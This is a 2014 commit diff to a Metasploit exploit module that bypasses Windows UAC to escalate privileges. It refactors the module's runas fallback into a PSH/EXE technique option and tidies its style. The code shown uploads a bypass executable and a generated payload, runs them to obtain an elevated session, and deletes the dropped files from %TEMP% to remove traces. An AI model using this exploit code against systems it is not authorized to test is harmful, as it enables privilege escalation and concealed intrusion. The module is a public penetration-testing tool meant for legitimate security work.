Change runas method to use lib

jamesbcook · jamesbcook · commit add5cefe17cf · 2014-08-01T17:13:24.000-07:00
Changed runas method to use the new runas lib.  Also did some rubocop
changes.
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
@@ -4,17 +4,17 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/exe'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Exploit::EXE
   include Post::File
   include Post::Windows::Priv
+  include Post::Windows::Runas
 
   def initialize(info={})
-    super( update_info( info,
+    super( update_info(info,
       'Name'          => 'Windows Escalate UAC Protection Bypass',
       'Description'   => %q{
         This module will bypass Windows UAC by utilizing the trusted publisher
@@ -23,9 +23,9 @@ def initialize(info={})
       },
       'License'       => MSF_LICENSE,
       'Author'        => [
-          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
-          'mitnick',
-          'mubix' # Port to local exploit
+        'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
+        'mitnick',
+        'mubix' # Port to local exploit
         ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
@@ -40,6 +40,11 @@ def initialize(info={})
       'DisclosureDate'=> "Dec 31 2010"
     ))
 
+    register_options([
+      OptEnum.new('TECHNIQUE', [true, 'Technique to use if UAC is turned off',
+                               'EXE', %w(PSH EXE)]),
+    ])
+
   end
 
   def check_permissions!
@@ -54,12 +59,12 @@ def check_permissions!
       if admin_group
         print_good('Part of Administrators group! Continuing...')
       else
-        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+        fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
       end
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
-      fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
+      fail_with(Exploit::Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
     end
   end
 
@@ -72,8 +77,8 @@ def exploit
         "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
       )
     when UAC_DEFAULT
-      print_good "UAC is set to Default"
-      print_good "BypassUAC can bypass this setting, continuing..."
+      print_good 'UAC is set to Default'
+      print_good 'BypassUAC can bypass this setting, continuing...'
     when UAC_NO_PROMPT
       print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
       runas_method
@@ -89,15 +94,13 @@ def exploit
     pid = cmd_exec_get_pid(cmd)
 
     ::Timeout.timeout(30) do
-      until session_created? do
-        select(nil,nil,nil,1)
-      end
+      select(nil, nil, nil, 1) until session_created?
     end
     session.sys.process.kill(pid)
     # delete the uac bypass payload
     file_rm(path_bypass)
     file_rm("#{expand_path("%TEMP%")}\\tior.exe")
-    cmd_exec("cmd.exe", "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"" )
+    cmd_exec('cmd.exe', "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"" )
   end
 
   def path_bypass
@@ -109,24 +112,24 @@ def path_payload
   end
 
   def upload_binaries!
-    print_status("Uploaded the agent to the filesystem....")
+    print_status('Uploaded the agent to the filesystem....')
     #
     # Generate payload and random names for upload
     #
     payload = generate_payload_exe
 
     # path to the bypassuac binary
-    path = ::File.join(Msf::Config.data_directory, "post")
+    path = ::File.join(Msf::Config.data_directory, 'post')
 
     # decide, x86 or x64
     bpexe = nil
     if sysinfo["Architecture"] =~ /x64/i
-      bpexe = ::File.join(path, "bypassuac-x64.exe")
+      bpexe = ::File.join(path, 'bypassuac-x64.exe')
     else
-      bpexe = ::File.join(path, "bypassuac-x86.exe")
+      bpexe = ::File.join(path, 'bypassuac-x86.exe')
     end
 
-    print_status("Uploading the bypass UAC executable to the filesystem...")
+    print_status('Uploading the bypass UAC executable to the filesystem...')
 
     begin
       #
@@ -143,37 +146,35 @@ def upload_binaries!
   end
 
   def runas_method
-    payload = generate_payload_exe
-    payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-    tmpdir = expand_path("%TEMP%")
-    tempexe = tmpdir + "\\" + payload_filename
-    write_file(tempexe, payload)
-    print_status("Uploading payload: #{tempexe}")
-    session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
-    print_status("Payload executed")
+    case datastore['TECHNIQUE']
+    when 'PSH'
+      # execute PSH
+      shell_execute_psh
+    when 'EXE'
+      # execute EXE
+      shell_execute_exe
+    end
   end
 
   def validate_environment!
     fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
     #
     # Verify use against Vista+
     #
-    winver = sysinfo["OS"]
+    winver = sysinfo['OS']
 
     unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
       fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
     end
 
     if is_uac_enabled?
-      print_status "UAC is Enabled, checking level..."
+      print_status 'UAC is Enabled, checking level...'
     else
       if is_in_admin_group?
-        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
+        fail_with(Exploit::Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
       else
-        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+        fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
       end
     end
   end
-
-
 end
